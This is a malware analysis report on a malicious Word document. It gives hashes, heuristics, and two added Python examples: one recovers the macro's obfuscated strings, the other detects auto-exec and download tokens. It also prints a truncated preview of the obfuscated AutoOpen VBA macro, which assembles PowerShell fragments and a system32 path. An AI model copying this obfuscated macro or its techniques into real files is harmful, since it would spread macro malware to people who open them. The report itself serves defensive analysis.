Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9adcef7e216aabf3…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 305.5 KB
Created: 2018-10-14 10:25:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5:     5e45ecbaad1723615e1d0447600990f7
SHA-1:   db38b9d4d6dad7573410d421e4f378979c58dbce
SHA-256: 9adcef7e216aabf33ab85e3991b1d7f4918f8668e5a78011cc4a57ca781dbb50
Risk score: 170

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document (OLE/CFB container) whose VBA project contains an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. The heuristics also flag a CreateObject call, which instantiates a COM object by ProgID and is the usual way a macro obtains a shell, scripting host, or HTTP client to run or fetch a second stage; the call itself is not within the portion of the preview reproduced here. The visible AutoOpen body is padded with hundreds of dead arithmetic assignments (for example teyusr = -92 / 179) whose only purpose is to inflate and obscure the routine. Between them, short string fragments are assembled with & and + concatenation: "te" & "mp" yields "temp"; Environ("SystemRoot") + "\sys" + "tem32\" + "Windo" builds a path under %SystemRoot%\system32\; and fragments such as "t';$eqkdsgfwuau", "fs';$omiyoaqrtauqjwhmooitlu='v" and ":tem';$ggpsidleyetsojuyizjzku=" read as pieces of PowerShell variable assignments of the form $name='value';. The obfuscation and the truncated preview prevent a full reconstruction of the final command line, but AutoOpen, CreateObject, environment-based path construction and PowerShell-like string assembly together strongly suggest a downloader or dropper that launches a second-stage script.
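The string assembly described above can be recovered without executing the macro. The following Python script is an added example written for this page (it is not part of the analysis platform or of the sample): it takes a subset of the lines shown in the macro preview, discards the dead arithmetic assignments, and evaluates the & / + concatenation chains in order, treating Environ("X") as the symbolic placeholder %X%. The helper names, the placeholder convention and the token lists are the example's own; the VBA lines are copied from the extracted macros.bas further down.

```python
import re

# Lines copied from the AutoOpen routine in the extracted macros.bas shown on
# this page (a subset; the junk arithmetic lines are kept on purpose so the
# filter can be seen working).
SAMPLE_VBA = r'''
Sub AutoOpen()
teyusr = -92 / 179
jlvxpoe = "$nhaagkq"
ohtbca = "te"
xqsevva1 = "mp"
iuzwmhmg = ohtbca & xqsevva1
pvfjwk = "ohchqpef"
pyiacce = "gheaicx+$iqaowaoen"
howlvkln0 = "zywqiabtlhlpi+"
Dim rhfjreuhd As String
rhfjreuhd = -152 + 128
feuye = "$gevaiiaog"
xpjrcgg32 = "guuienz+$sfu"
xzaou = "stisbugxy"
fxfnmreo10 = Environ("SystemRoot")
ebzuxkl = "xboahzyrhim"
cfpfamx = "ya+$audg"
qqabshq = jlvxpoe & pvfjwk & pyiacce & howlvkln0 & feuye & xpjrcgg32 & xzaou & ebzuxkl & cfpfamx
Dim giogqv, uyddyazkqo, hwyagxx, kkiso1 As Integer
azzketi = "t';$eqkdsgfwuau"
eemtjo = fxfnmreo10
eemtjo = eemtjo + "\sys"
neee = "subwhfw=' ''\gv"
gjtakb = "fs';$omiyoaqrtauqjwhmooitlu='v"
dlxhaio = ":tem';$ggpsidleyetsojuyizjzku="
gmiitcta = eemtjo
wlzlxcg = "tem32\"
gmiitcta = gmiitcta + wlzlxcg
ulzfmofj = "'book"
gksci = "skee';$iqaowaoe"
aoeetd = "nzywqiabtlhl"
uevunx12 = azzketi & neee & gjtakb & dlxhaio & ulzfmofj & gksci & aoeetd
crjof = "Windo"
gmiitcta = gmiitcta + crjof
End Sub
'''

ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
# String literal, Environ("VAR") call, identifier, number, or single-char operator.
TOKEN = re.compile(r'"[^"]*"|Environ\("[^"]+"\)|[A-Za-z_]\w*|-?\d+(?:\.\d+)?|[&+\-*/()]')
IDENT = re.compile(r"[A-Za-z_]\w*")


def _evaluate(tokens, env, target):
    """Concatenate a chain of literals/identifiers joined by & or +.
    Returns (value, referenced_names), or (None, ()) for anything that is not
    a pure string expression (the dead-code arithmetic, unknown calls)."""
    parts, refs = [], []
    for tok in tokens:
        if tok in ("&", "+"):
            continue
        if tok.startswith('"'):
            parts.append(tok[1:-1])
        elif tok.startswith("Environ("):
            parts.append("%" + tok[9:-2] + "%")   # symbolic, e.g. %SystemRoot%
        elif IDENT.fullmatch(tok):
            if tok not in env:
                return None, ()
            parts.append(env[tok])
            if tok != target:                      # x = x + "..." is not a use by another var
                refs.append(tok)
        else:
            return None, ()                        # number or arithmetic operator: junk
    return "".join(parts), tuple(refs)


def recover_strings(vba_source):
    """Emulate the string assignments line by line. Returns (env, consumed):
    env maps variable -> recovered string; consumed holds every variable that
    was fed into some other variable's right-hand side."""
    env, consumed = {}, set()
    for line in vba_source.splitlines():
        m = ASSIGN.match(line)
        if not m:
            continue                               # Dim, Sub, End Sub, ...
        name, rhs = m.groups()
        value, refs = _evaluate(TOKEN.findall(rhs), env, name)
        if value is None:
            continue
        env[name] = value
        consumed.update(refs)
    return env, consumed


def assembled_strings(vba_source):
    """Only the end products: strings that are built but never used to build
    another string. These are the values the macro goes on to act on."""
    env, consumed = recover_strings(vba_source)
    return {k: v for k, v in env.items() if k not in consumed}


def dollar_variables(text):
    """PowerShell-style $name tokens inside a recovered string, in order."""
    return re.findall(r"\$[A-Za-z_]\w*", text)


if __name__ == "__main__":
    for name, value in assembled_strings(SAMPLE_VBA).items():
        print(f"{name} = {value!r}  ${dollar_variables(value)}")
```

On this subset the emulator yields four end products: "temp", the path prefix %SystemRoot%\system32\Windo, and two long fragments containing ';$name=' sequences, which is what makes the PowerShell-assembly reading plausible. Anything the emulator cannot evaluate (a call other than Environ, a variable it never saw) is skipped rather than guessed, so on a full dump the unresolved assignments are exactly the lines an analyst still needs to read by hand.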

Heuristics (7)

  • VBA macros detected [medium] OLE_VBA_MACROS (4 related findings)
    Document contains VBA macro code.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project defines an AutoOpen subroutine, which Word runs automatically when the document is opened with macros enabled (see Sub AutoOpen() in the extracted source below).
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    The macro calls CreateObject, which instantiates a COM object by ProgID; in malicious documents this is typically a scripting host, shell, or HTTP client used to run or fetch the next stage. The call is not within the portion of the preview reproduced here.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download, or object-execution tokens. This catches p-code-only documents and documents whose source extraction fails, where no readable source is available.
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    The macro reads an environment variable via Environ(); here Environ("SystemRoot") is used as the base of a path assembled under %SystemRoot%\system32\.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat for this sample: a VBA project was in fact recovered (macros.bas below), so here this finding duplicates OLE_VBA_AUTOOPEN rather than adding independent evidence.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label gives the channel (macro, JS, link annotation, document body, ...) through which each URL was reached. All nine URLs below were found in document text (OLE body):
      • http://www.w3.org/1999/02/22-rdf-syntax-ns#
      • http://ns.adobe.com/xap/1.0/
      • http://ns.adobe.com/xap/1.0/mm/
      • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
      • http://ns.adobe.com/photoshop/1.0/
      • http://purl.org/dc/elements/1.1/
      • http://ns.adobe.com/tiff/1.0/
      • http://ns.adobe.com/exif/1.0/
      • http://schemas.openxmlformats.org/drawingml/2006/main
    These are XML namespace URIs (RDF, Adobe XMP/Photoshop/TIFF/EXIF image metadata, Dublin Core, and the OOXML DrawingML schema), most likely left behind by the metadata of an embedded image. They are identifiers, not addresses the macro contacts, and should not be treated as network indicators for this sample.
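The OLE_VBA_PCODE_AUTOEXEC_EXEC finding above is a token co-occurrence rule over a compiled VBA stream rather than over source. The Python below is an added example written for this page, not the platform's own detector: it pulls printable ASCII and UTF-16LE runs out of a stream's raw bytes (the way strings -a and strings -el would) and reports when an auto-execution name and an execution or download token appear in the same stream. The token lists and the two constructed sample streams are the example's own assumptions; a real implementation would run over the decompressed module streams from the VBA storage, which this example does not parse.

```python
import re

# Auto-execution entry points and execution/download tokens. These lists are
# this example's assumption, not the platform's signature set.
AUTOEXEC_TOKENS = (b"AutoOpen", b"AutoExec", b"AutoClose", b"Document_Open",
                   b"Workbook_Open", b"Auto_Open")
EXEC_TOKENS = (b"CreateObject", b"Shell", b"WScript.Shell", b"ShellExecute",
               b"URLDownloadToFile", b"MSXML2.XMLHTTP", b"WinHttp.WinHttpRequest")


def printable_runs(data, min_len=4):
    """Yield printable ASCII runs, then UTF-16LE runs (reduced to their ASCII
    bytes), of at least min_len characters. Compiled VBA streams mix both
    encodings, so a scanner that only looks at one misses identifiers."""
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield m.group()
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data):
        yield m.group()[::2]                      # drop the interleaved NULs


def scan_vba_stream(data):
    """Return which auto-exec and exec tokens occur in the stream and whether
    the co-occurrence rule fires (both kinds present)."""
    auto, execs = set(), set()
    for run in printable_runs(data):
        low = run.lower()                         # VBA identifiers are case-insensitive
        auto.update(t.decode() for t in AUTOEXEC_TOKENS if t.lower() in low)
        execs.update(t.decode() for t in EXEC_TOKENS if t.lower() in low)
    return {"autoexec": sorted(auto), "exec": sorted(execs),
            "hit": bool(auto) and bool(execs)}


# Constructed stand-ins for a module stream (not bytes from the sample):
# binary padding around one identifier stored as UTF-16LE and one as ASCII.
SUSPICIOUS_STREAM = (b"\x00\x01\xff" + "AutoOpen".encode("utf-16-le")
                     + b"\x00\x00\x12\x03" + b"CreateObject" + b"\x00\xde\xad")
# An auto-exec handler on its own (a Document_Open that only shows a MsgBox)
# must not fire the rule.
BENIGN_STREAM = (b"\x00\x01" + "Document_Open".encode("utf-16-le")
                 + b"\x00\x00" + b"MsgBox" + b"\x00")

if __name__ == "__main__":
    print(scan_vba_stream(SUSPICIOUS_STREAM))
    print(scan_vba_stream(BENIGN_STREAM))
```

The rule deliberately requires both halves: an auto-exec name alone is common in legitimate templates, and an object-creation token alone appears in plenty of benign automation, which is why the platform scores the combination high but the individual markers lower.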

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  187257 bytes
SHA-256: 79a44341aa5e3d7c0acf511695ba9f32d67d60e44e7205bfabd9573c5ceb2ce9

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function ufvrkvv(ovii)
ntuhzhydqhfz = -41 * 31
End Function
Function clwiu79()
nzeugie = -40 / 10
uiyarnu = -72 * 156
nxsao = -152 / 121
End Function
Function eyuypm(gpgwtixs)
pzulwuxxvj = -107 * 17
azaamteue = -174 / 2
eoide = -149 * 93
qdeiei = -37 * 86
End Function
Function cpxbm(flsfdoa30, vsdu03)
untyyddey = -37 + 155
End Function
Function agyeo(ndhy, yoyfk, vxayo)
eaiec = -71 - 122
zwyzkwcthbhw = -22 - 158
End Function
Function fraqflvn()
uuuvxua1 = -13 / 136
End Function
Function yvikpcha0()
pyegbqu = -81 + 63
End Function
Function wzyxfdao(xmaauy, eoddopu)
ozontijpl = -92 / 92
ukaoiyo = -72 - 180
End Function
Function ykwra6(aikcjshxg, avfak8, ksltrsb08)
gueufcu = -26 / 100
End Function
Function odbol()
oureekw39 = -55 / 87
End Function
Function vvqorlk(oulkl, tqixca)
ejbsya = -131 + 175
tjifgk2 = -130 / 34
uikpgesfyy = -42 - 161
End Function
Function zfogzsnq(gljdugxt, nflau, ekged9)
oeywmnyu = -106 * 129
xkakzig = -118 + 128
End Function
Sub AutoOpen()
teyusr = -92 / 179
aigaao = -120 / 145
jlvxpoe = "$nhaagkq"
uauui04 = -7 - 46
mauimx = -34 - 121
ohtbca = "te"
xqsevva1 = "mp"
xiouyyvb = -91 - 141
iwzlfww = -174 * 146
akuu = -101 - 98
iuzwmhmg = ohtbca & xqsevva1
upfeivkye = -71 - 143
pvfjwk = "ohchqpef"
kiirbvsbqsv = -43 * 79
loya = -82 * 164
pyiacce = "gheaicx+$iqaowaoen"
xqeoeo = -56 - 7
qcaye = -169 + 166
howlvkln0 = "zywqiabtlhlpi+"
ekpoo = -171 * 38
Dim rhfjreuhd As String
rhfjreuhd = -152 + 128
kflehpcepgc = -111 * 112
feuye = "$gevaiiaog"
nbaiy1 = -127 * 172
mscxsy = -117 * 15
wuqwyb = -43 / 176
xpjrcgg32 = "guuienz+$sfu"
cukrawvv = -80 - 109
xzaou = "stisbugxy"
fxfnmreo10 = Environ("SystemRoot")
ygneouodho00 = -178 / 157
nbbgkhlzx = -173 - 147
yoauey = -55 / 92
eoenvxu44 = -59 - 92
dlatlrefvapl = -124 / 38
ebzuxkl = "xboahzyrhim"
iaudvbldpt51 = -18 - 160
cfpfamx = "ya+$audg"
eiackncjvd = -50 / 148
eeaodmeb = -80 * 144
qqabshq = jlvxpoe & pvfjwk & pyiacce & howlvkln0 & feuye & xpjrcgg32 & xzaou & ebzuxkl & cfpfamx
auipw8 = -96 * 52
zjzcvxgru = -171 * 177
whufbqvpv = -100 / 113
mqwli47 = -87 * 68
tdbvooe = -14 + 38
Dim giogqv, uyddyazkqo, hwyagxx, kkiso1 As Integer
giogqv = -146 - 50
qkndjdil = -62 / 62
azzketi = "t';$eqkdsgfwuau"
ukdahpsd1 = -90 / 39
yyilbfshzj = -76 - 99
ocnpsddtee = -64 + 156
eemtjo = fxfnmreo10
auyya = -132 + 31
kuoa = -124 * 2
eemtjo = eemtjo + "\sys"
bscroxuvvb = -9 - 138
iaykhya = -17 / 33
Dim kaobwv As Integer
kaobwv = -151 - 100
neee = "subwhfw=' ''\gv"
uiosjri = -165 * 75
fdutjctl = -47 + 178
gjtakb = "fs';$omiyoaqrtauqjwhmooitlu='v"
puoaka = -153 / 155
ukvyeyy = -14 + 171
aijnoaopgcb = -142 - 172
dlxhaio = ":tem';$ggpsidleyetsojuyizjzku="
rzqiu = -178 + 139
ooyrwpbo = -106 + 34
oapz = -147 * 151
gmiitcta = eemtjo
mwjiu8 = -170 + 1
ruufqk = -108 * 118
wlzlxcg = "tem32\"
omdtzqumxey = -148 / 58
yykplckcgvj = -120 * 46
gmiitcta = gmiitcta + wlzlxcg
kwybmiktc = -18 + 77
ongoxayc = -129 - 92
dqoyoo00 = -168 * 23
fmsyhmse = -83 + 14
eibrbxkvp = -83 - 155
ulzfmofj = "'book"
juadyoli09 = -138 / 113
gksci = "skee';$iqaowaoe"
jndnzoau = -117 + 35
Dim aaoyae As Integer
aaoyae = -38 + 111
aoeetd = "nzywqiabtlhl"
uphnze31 = -117 / 105
uevunx12 = azzketi & neee & gjtakb & dlxhaio & ulzfmofj & gksci & aoeetd
Dim hajvvq64 As Integer
hajvvq64 = -16 / 172
amfoevtvgtq = -91 + 163
xhenjslqmdva70 = -39 / 91
crjof = "Windo"
hhpyy = -22 - 143
rplkhrxfhap = -32 + 29
iyyoueaj = -154 - 86
gmiitcta = gmiitcta + crjof
oyliipnrx = -104 * 16
uuxraueapr = -138 + 105
mlgiagzngtp = -98 - 8
oylo = -57 * 134
uuwbbvoko = -7 + 3
ubkuyp = -127 / 81
stmcyae37 = -163 * 36
ugyrn = "hqlitooo"
Dim jbuutu As String
jbuutu = -174 + 97
eomkqoa = -7 + 1
... (truncated)